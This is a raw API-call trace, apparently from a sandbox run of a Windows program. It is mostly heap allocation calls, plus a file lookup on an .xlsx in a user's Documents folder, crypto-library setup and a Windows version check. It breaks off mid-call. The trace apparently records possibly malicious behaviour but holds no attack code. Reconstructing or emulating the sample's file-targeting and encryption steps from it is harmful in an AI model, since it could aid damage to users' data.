RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0263.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0263.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0263.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0263.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0263.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0263.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0263.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0263.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0263.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0263.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0263.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0263.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0263.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0263.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0263.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0263.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0263.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0263.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0263.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0263.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0263.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0263.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0263.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0263.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0263.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0263.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0263.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0263.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0263.867] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0263.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0263.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0263.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0263.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0263.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0263.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0263.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0263.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0263.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0263.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0263.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0263.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0263.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0263.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0263.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0263.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0263.868] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0263.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0263.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0263.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0263.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0263.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0263.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0263.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0263.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0263.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0263.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0263.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0263.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0263.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0263.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0263.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0263.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0263.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0263.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0263.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0263.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0263.869] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/ith_1X2kFN3hB-U9.xlsx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc77d7e0, ftCreationTime.dwHighDateTime=0x1d5cd35, ftLastAccessTime.dwLowDateTime=0x7fdfbdc0, ftLastAccessTime.dwHighDateTime=0x1d5b6d0, ftLastWriteTime.dwLowDateTime=0x7fdfbdc0, ftLastWriteTime.dwHighDateTime=0x1d5b6d0, nFileSizeHigh=0x0, nFileSizeLow=0x12e2a, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="ith_1X2kFN3hB-U9.xlsx", cAlternateFileName="ITH_1X~1.XLS")) returned 0xa87250 [0263.869] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0263.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0263.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0263.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0263.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0263.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0263.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0263.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0263.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0263.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0263.870] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0263.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0263.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0263.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0263.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0263.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0263.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0263.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0263.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0263.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0263.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0263.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0263.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0263.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0263.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0263.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0263.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0263.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0263.871] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0263.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0263.871] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0263.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0263.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0263.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51628 [0263.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0263.871] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0263.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0263.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0263.871] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0263.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0263.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0263.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517c0 [0263.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0263.871] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0263.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0263.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0263.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0263.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0263.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0263.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0263.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0263.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0263.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0263.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0263.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0263.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0263.872] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0263.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0263.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0263.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0263.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0263.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0263.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0263.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0263.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0263.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0263.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0263.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0263.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0263.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0263.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0263.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0263.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0263.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0263.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0263.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0263.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0263.873] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0263.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0263.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0263.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0263.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0263.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0263.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0263.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0263.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0263.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0263.874] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0263.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0263.874] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0263.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0263.874] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0263.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0263.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0263.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0263.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bd8 [0263.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0263.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0263.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0263.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0263.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a30 [0263.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0263.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0263.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0263.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0263.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0263.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0263.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0263.875] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0263.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0263.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0263.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0263.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0263.875] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0263.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0263.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0263.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0263.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0263.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0263.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0263.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0263.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0263.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0263.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0263.876] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0263.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0263.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0263.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0263.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0263.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0263.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0263.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0263.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0263.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0263.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0263.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0263.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0263.876] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0263.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0263.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0263.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0263.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0263.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0263.877] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.877] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0263.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0263.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0263.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0263.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0263.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0263.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0263.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0263.878] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0263.878] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0263.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0263.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0263.878] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) 